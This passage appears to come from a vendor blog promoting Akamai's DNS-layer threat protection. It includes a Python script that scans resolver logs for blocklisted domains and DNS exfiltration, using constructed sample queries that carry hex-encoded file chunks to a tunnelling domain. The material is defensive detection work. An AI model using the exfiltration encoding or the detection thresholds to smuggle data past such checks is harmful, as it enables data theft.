And so, it’s wise and imperative to secure the DNS layer as part of a defense-in-depth security strategy. As a security control point, DNS layer security offers a proactive way to uniformly and immediately block malicious domains and communications for all of your users, whether they are on or off network. It can also deliver lower latency, fewer broken sites and apps, and improved network performance.
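The two DNS abuses described above, lookups of known-bad domains and data smuggled out inside query names, can be triaged from recursive-resolver logs. The following is an added example, not Akamai’s code or ETP’s logic, that checks each query name against a blocklist (including parent domains), tags unusually long or high-entropy labels, and counts distinct long-label names per client and base domain, because a hex-encoded file split into chunks produces low-entropy runs (long strings of zeros) that an entropy test on a single query would miss. The log format, blocklist, thresholds and the two-label base-domain approximation are assumptions, and the log lines are constructed.

```python
"""
Added example (not code from the original post or from Akamai): triage of
resolver query logs for blocklisted domains and DNS-based exfiltration.
Log format, blocklist and thresholds are assumptions; the log lines are
constructed, not real traffic.
"""
import math
from collections import defaultdict

# Assumed blocklist of domains; a match covers all their subdomains.
BLOCKLIST = {"malicious-example.net"}
LONG_LABEL = 20          # labels at or above this length are rare in human-chosen names
HIGH_ENTROPY = 3.5       # bits per character; encoded data usually sits well above this
EXFIL_MIN_UNIQUE = 3     # distinct long-label names per (client, base domain) to flag

# Constructed log lines: timestamp, client IP, query name, query type.
LOG_LINES = """\
2019-08-02T10:00:01Z 10.0.0.5 www.example.com A
2019-08-02T10:00:02Z 10.0.0.5 mail.example.com A
2019-08-02T10:00:03Z 10.0.0.7 update.malicious-example.net A
2019-08-02T10:00:04Z 10.0.0.9 4d5a90000300000004000000ffff0000.data.tunnel-example.org TXT
2019-08-02T10:00:05Z 10.0.0.9 b800000000000000400000000000000.data.tunnel-example.org TXT
2019-08-02T10:00:06Z 10.0.0.9 0000000000000000000000000000000.data.tunnel-example.org TXT
2019-08-02T10:00:07Z 10.0.0.11 ntqwmkvlsjgv3pv5c7bxt2qfgoyaurjz.cdn-example.com TXT
2019-08-02T10:00:08Z 10.0.0.5 cdn.example.com A
"""


def shannon_entropy(s):
    """Bits of entropy per character of s (0.0 for the empty string)."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def is_blocklisted(qname):
    """True if qname or any of its parent domains is on the blocklist."""
    labels = qname.lower().rstrip(".").split(".")
    return any(".".join(labels[i:]) in BLOCKLIST for i in range(len(labels)))


def base_domain(qname):
    """Registrable domain approximated as the last two labels. Production code
    would consult the public suffix list; this is an assumption for the example."""
    labels = qname.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def triage_query(qname):
    """Per-query tags, sorted so results compare predictably."""
    tags = []
    if is_blocklisted(qname):
        tags.append("blocklisted")
    longest = max(qname.split("."), key=len)
    if len(longest) >= LONG_LABEL:
        tags.append("long_label")
        if shannon_entropy(longest) >= HIGH_ENTROPY:
            tags.append("high_entropy_label")
    return sorted(tags)


def analyze_dns_log(text):
    """Tag each query and aggregate long-label names per (client, base domain).
    The aggregate catches low-entropy chunks of an encoded file that the
    per-query entropy test lets through."""
    per_query = []
    long_names = defaultdict(set)
    for line in text.splitlines():
        if not line.strip():
            continue
        _ts, client, qname, _qtype = line.split()
        tags = triage_query(qname)
        per_query.append((client, qname, tags))
        if "long_label" in tags:
            long_names[(client, base_domain(qname))].add(qname)
    exfil = sorted((client, dom, len(names))
                   for (client, dom), names in long_names.items()
                   if len(names) >= EXFIL_MIN_UNIQUE)
    return {"per_query": per_query, "exfil_suspects": exfil}


if __name__ == "__main__":
    result = analyze_dns_log(LOG_LINES)
    for client, qname, tags in result["per_query"]:
        if tags:
            print(client, qname, tags)
    print("exfil suspects:", result["exfil_suspects"])
```

The sample deliberately includes the first bytes of a hex-encoded PE file: its third chunk is all zeros and scores zero entropy, so only the per-client count of distinct long-label names under tunnel-example.org surfaces it. Whatever the thresholds, the blocklist path is the cheap, high-confidence control; the heuristics exist for the domains the blocklist has not seen yet.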


These are the drivers for the Akamai Enterprise Threat Protector (ETP) solution. ETP is a Secure Internet Gateway that provides advanced threat protection in the cloud for all your users, wherever they are, and acts as their safe on-ramp to the internet. ETP uses multiple layers of protection, DNS, URL and inline payload analysis, to provide security with reduced complexity and without impacting performance. Companies simply direct their recursive DNS traffic to Enterprise Threat Protector’s global servers, where every requested domain is checked against Akamai’s real-time domain risk scoring threat intelligence. Safe domains are resolved as normal, malicious domains are blocked, and risky domains are sent to a smart selective proxy where the HTTP or HTTPS URLs are inspected to determine whether they are malicious. The HTTP and HTTPS payloads from risky domains are then scanned in real time using multiple advanced malware-detection engines.

ETP improves security defenses. It reduces security complexity and increases the efficiency of security teams. Find out more here.